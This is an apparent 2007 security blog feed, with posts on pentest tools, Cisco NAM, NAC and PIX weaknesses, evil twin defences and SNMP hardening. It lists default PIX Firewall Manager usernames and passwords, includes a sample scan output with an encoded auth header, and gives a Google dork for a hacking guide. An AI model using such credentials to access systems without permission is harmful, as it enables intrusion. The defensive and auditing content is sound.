Well, this is just my point of view, but you can argue.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3089242007335060179?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3089242007335060179/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3089242007335060179' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3089242007335060179'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3089242007335060179'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/windows-vista-forensics.html' title='Windows Vista Forensics'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2507191117983786561</id><published>2007-04-17T18:39:00.000+08:00</published><updated>2007-04-17T18:57:08.947+08:00</updated><title type='text'>Tactical VoIP Toolkit Released</title><content type='html'>Guys, if you are into VoIP auditing, the Grugq has finally released his long waited Tactical VoIP Toolkit. I was using this tool at HiTB when he first released it to the students attending his training. It was written in Python and best of all, it is customizable. You can write your own VoIP security tools on top of the Toolkit. This makes it very portable and flexible in terms of the tool's function. 
Currently there are only siping and ravage, but they are sufficient to perform a basic audit and analysis. &lt;br /&gt;&lt;br /&gt;"The Tactical VoIP Toolkit (TacVTK) is a collection of tools designed specifically for VoIP security assessment. The TacVTK's functionality will expand as new tools are developed and integrated."&lt;br /&gt;&lt;br /&gt;Please visit the Grugq's site at &lt;a href="http://www.tacticalvoip.com"&gt;http://www.tacticalvoip.com&lt;/a&gt; to download this free and powerful tool. Hey Grugq, big ups to you. :)&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2507191117983786561?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2507191117983786561/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2507191117983786561' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2507191117983786561'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2507191117983786561'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/tactical-voip-toolkit-released.html' title='Tactical VoIP Toolkit Released'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4271433313232068570</id><published>2007-04-16T18:39:00.000+08:00</published><updated>2007-04-16T19:07:38.049+08:00</updated><title type='text'>Wapiti and proxmon</title><content 
type='html'>I was posting on &lt;a href="http://sla.ckers.org/forum"&gt;Rsnake's forum&lt;/a&gt; about the web penetration testing tools that most web application pentesters use. For me, I only use WebScarab, Rsnake's XSS cheat sheet, Wikto and Firefox add-ons like Tamper Data and Live HTTP Headers for my testing. These tools are good enough for me to get the job done most of the time. Sometimes it depends on how far I actually want to break into systems during a test. If the application shows a lot of vulnerabilities in a simple scan, nuff said, please patch your system. If the application is robust enough, I am very determined to dig in further and uncover flaws. &lt;br /&gt;&lt;br /&gt;The other night, Jeremiah posted a topic on "&lt;a href="http://jeremiahgrossman.blogspot.com/"&gt;Vulnerability Assessment, When do we stop looking?&lt;/a&gt;" and I commented that if the application is vulnerable to simple scans, it is not worth digging in further, whereas if the application is robust, it is worth every single effort to explore more flaws. And when do we stop? It all depends on how likely you think it is that the application still has serious vulnerabilities. As I was commenting on his blog, I was thinking of a tool that could simplify my auditing process, and I happened to read jungsonn's comment. He recommended a very useful tool that I am going to test once I have finished my project over here. Yes, it's hectic here, and sorry for the lack of updates, guys. 
Here is a short excerpt.&lt;br /&gt;&lt;br /&gt;Wapiti:&lt;br /&gt;* File Handling Errors (Local and remote include/require, fopen, readfile…) &lt;br /&gt;* Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections) &lt;br /&gt;* XSS (Cross Site Scripting) Injection &lt;br /&gt;* LDAP Injection &lt;br /&gt;* Command Execution detection (eval(), system(), passthru()…) &lt;br /&gt;* CRLF Injection (HTTP Response Splitting, session fixation…) &lt;br /&gt;&lt;br /&gt;I managed to test it a little and it seems to be a good tool, and best of all it is open source, which means it is free!! You will need Python to use this tool. More can be found here: &lt;a href="http://wapiti.sourceforge.net"&gt;http://wapiti.sourceforge.net&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;As I was playing around with this tool, I was thinking about Black Hat. I wanted to see the latest exploits that security researchers had found, and I stumbled across another web application pentesting tool: &lt;a href="http://code.google.com/p/proxmon/"&gt;proxmon&lt;/a&gt;. It was written by Jonathan Wilkins, who presented it at Black Hat Europe 2007, so I guess it wouldn't be a bad tool to use. A sample of the tool's output is shown below: &lt;br /&gt;&lt;br /&gt;[*] starting ProxMon v1.0.15 (http://www.isecpartners.com)&lt;br /&gt;[*] Copyright (C) 2007, Jonathan Wilkins, iSEC Partners Inc.&lt;br /&gt;[*] Proxmon comes with ABSOLUTELY NO WARRANTY;&lt;br /&gt;[*] This is free software, and you are welcome to redistribute it&lt;br /&gt;[*] under certain conditions; see accompanying file LICENSE for &lt;br /&gt;[*] details on warranty and redistribution details.&lt;br /&gt;[*] Loading support for: WebScarab&lt;br /&gt;[*] Loading Checks ... 
&lt;br /&gt; - Find interesting comments&lt;br /&gt; - Find cookie values that also are sent on the query string&lt;br /&gt; - Find HTTP Basic or Digest Authentication usage&lt;br /&gt; - Identify frameworks and scripts in use by server&lt;br /&gt; - Find dangerous functions in JavaScript code&lt;br /&gt; - Find offsite redirects&lt;br /&gt; - Find cookies with the secure flag that also get sent cleartext&lt;br /&gt; - Find values set over SSL that later go cleartext&lt;br /&gt; - Find values sent to other domains&lt;br /&gt; - Find common undesirable directories&lt;br /&gt; - Find files that indicate common vulnerabilities&lt;br /&gt; - Find directories that allow directory listing&lt;br /&gt; - Find SSL server configuration issues&lt;br /&gt; - Find directories writable via PUT&lt;br /&gt;[*] 14 checks loaded&lt;br /&gt;[*] Finding available sessions ...&lt;br /&gt;[*] Processing session test/webscarab in test&lt;br /&gt;[*] Running in monitor mode&lt;br /&gt;[*] Monitoring test/webscarab&lt;br /&gt;[*] Parsing existing conversations ...&lt;br /&gt;[*] Interesting comment: XXX in http://scratch.bitland.net:80/ (TIDs: 35)&lt;br /&gt;[*] Interesting comment: bug in http://www.bitland.net:80/ (TIDs: 532)&lt;br /&gt;[*] Interesting comment: TODO in http://scratch.bitland.net:80/ (TIDs: 35)&lt;br /&gt;[*] Interesting comment: ??? in http://scratch.bitland.net:80/ (TIDs: 35)&lt;br /&gt;[*] Interesting comment: !!! in http://scratch.bitland.net:80/ (TIDs: 35)&lt;br /&gt;[*] Cookie value seen on QS: secret1 (Secure, SSL) (TIDs: 16)&lt;br /&gt;[*] Cookie value seen on QS: secret2 (Secure, SSL) (TIDs: 9)&lt;br /&gt;[*] Digest auth seen: Authorization: Digest username='jwilkins', realm='scratchdigest', [snip ...] 
(TIDs: 34)&lt;br /&gt;[*] Basic auth seen: Authorization: Basic andpbGtpbnM6YXNkZmFzZGY= (TIDs: 31, 32)&lt;br /&gt;[*] IDed framework: scratch.bitland.net:80 is using PHP/5.2.1 (http://www.php.net) (TIDs: 35)&lt;br /&gt;[*] IDed framework: www.isecpartners.com:80 is using YUI/1.2.3 (http://developer.yahoo.com/yui) (TIDs: 16)&lt;br /&gt;[*] Unsafe JavaScript found: eval at http://scratch.bitland.net:80/:15 (TIDs: 35)&lt;br /&gt;[*] Unsafe JavaScript found: eval at http://scratch.bitland.net:80/:16 (TIDs: 35)&lt;br /&gt;[*] Secure cookie value sent clear: secret2 (TIDs: 7, 9)&lt;br /&gt;[*] Secure cookie value sent clear: secret1 (TIDs: 16, 36)&lt;br /&gt;[*] Value set over SSL sent clear: secret2 as secure2 (TIDs: 7)&lt;br /&gt;[*] Value set over SSL sent clear: secret2 as bar (TIDs: 9)&lt;br /&gt;[*] Value set over SSL sent clear: secret1 as foobar (TIDs: 16)&lt;br /&gt;[*] Value set over SSL sent clear: secret1 as asdf (TIDs: 36)&lt;br /&gt;[*] Value (secret1) sent to multiple domains: bitland.net (TIDs: 5, 6, 36)&lt;br /&gt;[*] Value (secret1) sent to multiple domains: isecpartners.com (TIDs: 16)&lt;br /&gt;[*] Bad directory found: /backup/ on scratch.bitland.net:80 (TIDs: 0)&lt;br /&gt;[*] Bad file found: /environ.pl on scratch.bitland.net:80 (TIDs: 0)&lt;br /&gt;[*] Listing of /listable/ on scratch.bitland.net:80 succeeded (TIDs: 0)&lt;br /&gt;[*] SSL Config issue https://www.bitland.net:443: aNULL null cipher (TIDs: 0)&lt;br /&gt;[*] SSL Config issue https://www.bitland.net:443: Export strength ciphers (TIDs: 0)&lt;br /&gt;[*] SSL Config issue https://www.bitland.net:443: 40 bit Export strength ciphers (TIDs: 0)&lt;br /&gt;[*] SSL Config issue https://www.bitland.net:443: Low strength ciphers (TIDs: 0)&lt;br /&gt;[*] SSL Config issue https://www.bitland.net:443: SSLv2 protocol (TIDs: 0)&lt;br /&gt;[*] Upload to /put/ on scratch.bitland.net:80 succeeded (TIDs: 0)&lt;br /&gt;[*] Parsed 38 existing conversations&lt;br /&gt;[*] Session is not active, no point in 
monitoring&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4271433313232068570?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4271433313232068570/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4271433313232068570' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4271433313232068570'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4271433313232068570'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/wapiti-and-proxmon.html' title='Wapiti and proxmon'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3422806284403903545</id><published>2007-04-15T16:08:00.001+08:00</published><updated>2007-04-15T16:18:32.298+08:00</updated><title type='text'>Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM Vulnerability</title><content type='html'>"Cisco Catalyst 6000, 6500 series and Cisco 7600 series that have a Network Analysis Module installed are vulnerable to an attack, which could allow an attacker to gain complete control of the system. Only Cisco Catalyst systems that have a NAM on them are affected. 
This vulnerability affects systems that run Internetwork Operating System(IOS) or Catalyst Operating System (CatOS)."&lt;br /&gt;&lt;br /&gt;More information can be found here:&lt;br /&gt;&lt;a href="http://www.cisco.com/warp/public/707/cisco-sa-20070228-nam.shtml"&gt;http://www.cisco.com/warp/public/707/cisco-sa-20070228-nam.shtml&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"NAMs communicate with the Catalyst system by using the Simple Network Management Protocol (SNMP). By spoofing the SNMP communication between the Catalyst system and the NAM an attacker may obtain complete control of the Catalyst system."&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3422806284403903545?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3422806284403903545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3422806284403903545' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3422806284403903545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3422806284403903545'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/cisco-catalyst-6000-6500-series-and_15.html' title='Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM Vulnerability'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3724790643432438827</id><published>2007-04-13T20:07:00.000+08:00</published><updated>2007-04-13T20:23:43.045+08:00</updated><title type='text'>Cisco PIX PFM plaintext password revealed</title><content type='html'>For those who use PIX Firewall Manager to configure and manage your firewall, you are at risk of your firewall password being obtained by an intruder or an insider. Why? Because after the PFM software makes an initial connection to the PIX Firewall, the administrative password is stored in plaintext on the local management workstation. I am not sure exactly where it is stored, but it might be in the registry; otherwise search the PFM installation directory for log or text files, it might be inside one of those. So, to avoid that, Cisco recommends using PIX Device Manager (PDM) instead. Well, for me, I never use PDM or PFM to configure the firewall; the IOS itself is good enough for me. Also, always make a habit of logging off your PC after you finish using it. 
The default username and password for PFM are as shown below: &lt;br /&gt;&lt;br /&gt;Administrator username: pixadmin&lt;br /&gt;Administrator password: cisco&lt;br /&gt;&lt;br /&gt;Normal user username: pixuser&lt;br /&gt;Normal user password: cisco&lt;br /&gt;&lt;br /&gt;Change the default user accounts to avoid compromise.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3724790643432438827?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3724790643432438827/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3724790643432438827' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3724790643432438827'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3724790643432438827'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/cisco-pix-pfm-plaintext-password.html' title='Cisco PIX PFM plaintext password revealed'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1384332532658098940</id><published>2007-04-12T21:51:00.000+08:00</published><updated>2007-04-12T22:08:43.464+08:00</updated><title type='text'>NACAttack BlackHat Europe 2007</title><content type='html'>Last night I blogged about the possibility of a NAC attack. Today, I found out that this had already been presented. 
Ok, I know I am slow at catching up, but the two German researchers managed to spoof the posture validation between a Cisco Trust Agent and the Cisco ACS (Access Control Server), and to gain access to the network even if the endpoint is not compliant with the posture validation checks. To download the presentation and whitepapers, go to: &lt;a href="http://www.blackhat.com/html/bh-media-archives/bh-archives-2007.html#eu"&gt;http://www.blackhat.com/html/bh-media-archives/bh-archives-2007.html#eu&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1384332532658098940?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1384332532658098940/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1384332532658098940' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1384332532658098940'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1384332532658098940'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/nacattack-blackhat-europe-2007.html' title='NACAttack BlackHat Europe 2007'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6760102156694647215</id><published>2007-04-11T19:04:00.000+08:00</published><updated>2007-04-11T19:06:41.592+08:00</updated><title type='text'>Hacking Cisco NAC - NACATTACK</title><content type='html'>Dror-John Roecher 
and Michael Thumann were able to hack the Cisco NAC solution by exploiting a fundamental design flaw. In this video they illustrate how they worked towards this discovery and give some exploit details. It is not their intention simply to release a tool; they want the audience to understand how Cisco NAC works and why it is not as secure as Cisco wants us to believe.&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/8wTxiXR--Uc"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/8wTxiXR--Uc" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6760102156694647215?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6760102156694647215/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6760102156694647215' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6760102156694647215'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6760102156694647215'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/hacking-cisco-nac-nacattack_11.html' title='Hacking Cisco NAC - NACATTACK'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-411302500019341820</id><published>2007-04-10T17:38:00.000+08:00</published><updated>2007-04-10T20:05:38.943+08:00</updated><title type='text'>Defeating Evil Twin</title><content type='html'>The other day I was discussing with thrill how to detect and defeat an Evil Twin, and what the best options are besides WEP or WPA. For folks who still don't know, WEP can be broken outright and WPA-PSK falls to an offline dictionary attack on the captured handshake when the passphrase is weak, so neither is considered secure on its own. Check my previous post and you will find the tools needed to break those keys. It boils down to two options, but I will let you decide which one is more secure. &lt;br /&gt;&lt;br /&gt;Thrill suggested placing an Access Point in the DMZ and giving it a private IP. A VPN server would also need to be set up in the DMZ to listen for clients that want to connect through the AP and use the wireless service. That way, an attacker who sets up an Evil Twin gains nothing from it: the client has to bring up a VPN tunnel to the VPN server before any surfing can continue, and if the client verifies the server's certificate, a rogue AP cannot impersonate that server either. This has several advantages and disadvantages, depending on how you look at it. The advantages are, first, that all traffic is encrypted, because it is tunnelled to the VPN server before going out to the Internet; second, that the SSID can be broadcast and no WEP/WPA security is needed (if you are paranoid, you can add a WPA key as well); and third, that it defeats most Evil Twin attacks. Below is a diagram which depicts the whole scenario. 
&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RhtcT8cQyPI/AAAAAAAAAV4/wt4vAPogzBc/s1600-h/Wireless_Basic.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RhtcT8cQyPI/AAAAAAAAAV4/wt4vAPogzBc/s200/Wireless_Basic.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5051732904738081010" /&gt;&lt;/a&gt;&lt;br /&gt;According to thrill, it is not necessary to implement a DMZ zone. It could be an extra network card on the VPN server, with only the server itself and the AP connected to it. Thrill said: "The trick is to not allow routing through this interface, and to set up a VPN server on that machine listening ONLY on that interface. And maybe a DHCP server on that interface as well. This is how this network becomes secure, and someone setting up an Evil Twin wouldn't be able to duplicate it. And even if they did, the VPN client can be set up to authenticate a server-side certificate easily enough." I won't say this is 100% secure, but it is the best solution he could think of, and I agree that it is a good solution. The downside of this setup is that every user needs to install the OpenVPN client software on their machine and needs to be told about the setup. That's a hassle.&lt;br /&gt;&lt;br /&gt;On the other side, thrill also said: "using 802.1x authentication along with a Radius server for logging in the user. Some of you may have already heard of the technology; it uses the Odyssey client by Funk Software, along with their Steel Belted Radius. Using Cisco APs we were able to enable rotating WEP keys that were only given to the client if their certificate could be authenticated. Once they were connected to the wireless network, they then needed to authenticate their user/password via the Radius, which pointed to the LDAP portion of AD. The trick for rotating SSID/WEP keys is using a certificate to authenticate to the actual AP. 
The AP is set up to point to a Radius server which has the certificate on it, then the client sends the AP the supplication requesting the SSID/Key, the AP forwards the request to the Radius server, which authenticates the certificate and sends an OK to the AP, who in turn sends the client the SSID/Key to authenticate." The diagram below depicts the scenario:&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/RhtoCccQyQI/AAAAAAAAAWA/aoqHbPjIEWs/s1600-h/8021X-Overview.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/RhtoCccQyQI/AAAAAAAAAWA/aoqHbPjIEWs/s200/8021X-Overview.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5051745798229903618" /&gt;&lt;/a&gt;&lt;br /&gt;Whichever is better, if something becomes too hard to use or requires too many steps, most people will be lazy and not care about it. But then again, it all depends on how the organization wants to implement its systems. Just my opinion.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-411302500019341820?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/411302500019341820/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=411302500019341820' title='24 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/411302500019341820'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/411302500019341820'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/defeating-evil-twin.html' title='Defeating Evil 
Twin'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/RhtcT8cQyPI/AAAAAAAAAV4/wt4vAPogzBc/s72-c/Wireless_Basic.jpg' height='72' width='72'/><thr:total>24</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-5161314942203670601</id><published>2007-04-09T16:03:00.000+08:00</published><updated>2007-04-10T01:07:28.532+08:00</updated><title type='text'>Rsnake and Jeremiah new XSS book</title><content type='html'>Ok guys, I need to show some love for my man Rsnake and Jeremiah. They are releasing a new book called Cross Site Scripting Attacks: XSS Exploits and Defense, and of course I am all out to go get it. This is definitely one not to be missed. Get it while it's hot.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp1.blogger.com/_Zx8XWzC_KPQ/Rhn1lQmhmdI/AAAAAAAAAVg/BX81ueoXwZM/s1600-h/xss.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_Zx8XWzC_KPQ/Rhn1lQmhmdI/AAAAAAAAAVg/BX81ueoXwZM/s200/xss.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5051338477533239762" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-5161314942203670601?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/5161314942203670601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=5161314942203670601' title='1 Comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5161314942203670601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5161314942203670601'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/rsnake-new-xss-book.html' title='Rsnake and Jeremiah new XSS book'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_Zx8XWzC_KPQ/Rhn1lQmhmdI/AAAAAAAAAVg/BX81ueoXwZM/s72-c/xss.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7758886627154166997</id><published>2007-04-09T15:37:00.000+08:00</published><updated>2007-04-10T14:32:20.760+08:00</updated><title type='text'>Becoming an Ethical hacker.</title><content type='html'>For those of you who wish to be a hacker, you will need some small tricks here and there, and of course a great deal of knowledge will help. There is a PDF out on the internet which actually shows you how you can become a hacker. Some of you might already have it, but for those who want to become a hacker and want to know the jack of all trades in hacking, do a simple Google dork with: &lt;br /&gt;&lt;br /&gt;filetype:pdf "Becoming a Hacker – Part 1"&lt;br /&gt;&lt;br /&gt;Download the PDF and there you learn hacking. Let me know what you guys think.&lt;br /&gt;&lt;br /&gt;Disclaimer: Please do not use the document you downloaded to perform any illegal activities. 
I will not hold any responsibility in this matter.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7758886627154166997?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7758886627154166997/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7758886627154166997' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7758886627154166997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7758886627154166997'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/becoming-hacker.html' title='Becoming an Ethical hacker.'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1076199779711475037</id><published>2007-04-08T18:06:00.000+08:00</published><updated>2007-04-09T00:36:33.113+08:00</updated><title type='text'>Verifying authentication mechanisms used in routing protocols</title><content type='html'>Way back in a previous post, I gave a list of auditing commands to follow when auditing Cisco routers. Now it's time to verify whether the protocols themselves use an authentication mechanism to defeat most attacks. Most of the time after a penetration test, if you find the telnet port open, you suggest that the client use SSH instead of telnet. This is fine, because migrating between those two is easy. What if the SNMP port is open? 
Do you tell the client to disable it because it is vulnerable to attacks, or suggest upgrading to the latest version? What about compatibility and interoperability issues between SNMPv2c and SNMPv3? What if the client needs this protocol for monitoring? Well, there is usually a solution. Below are steps you can take to make sure a "vulnerable" protocol is at least protected against the common unauthenticated attacks: community-string queries from arbitrary hosts and spoofed routing updates.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;SNMP&lt;/strong&gt;: Make sure an access-list is used to limit the machines that are allowed to query the router. For example, see the following commands:&lt;br /&gt;&lt;br /&gt;Set the access-lists to permit only the IPs that are allowed to access the router.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;access-list 12 permit 192.168.1.1&lt;br /&gt;access-list 13 permit 192.168.1.2&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The commands below set the community strings, which act as passwords, and bind them to access-lists 12 and 13 (the ACL number on the community line must match one that is actually defined; an undefined ACL restricts nothing). Use a long, random community string to resist brute-force and dictionary attacks, and give a community RW only if write access is really needed. Bear in mind that with SNMPv1/v2c the community string crosses the wire in clear text and SNMP runs over UDP, so an attacker who has sniffed the string can still send a spoofed SET from an allowed source address; SNMPv3 with authentication is the proper fix where the monitoring tools support it.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;snmp-server community cisco1 RW 12&lt;br /&gt;snmp-server community cisco2 RO 13&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The commands below allow the router to send traps to the SNMP manager machines.&lt;br /&gt;&lt;br 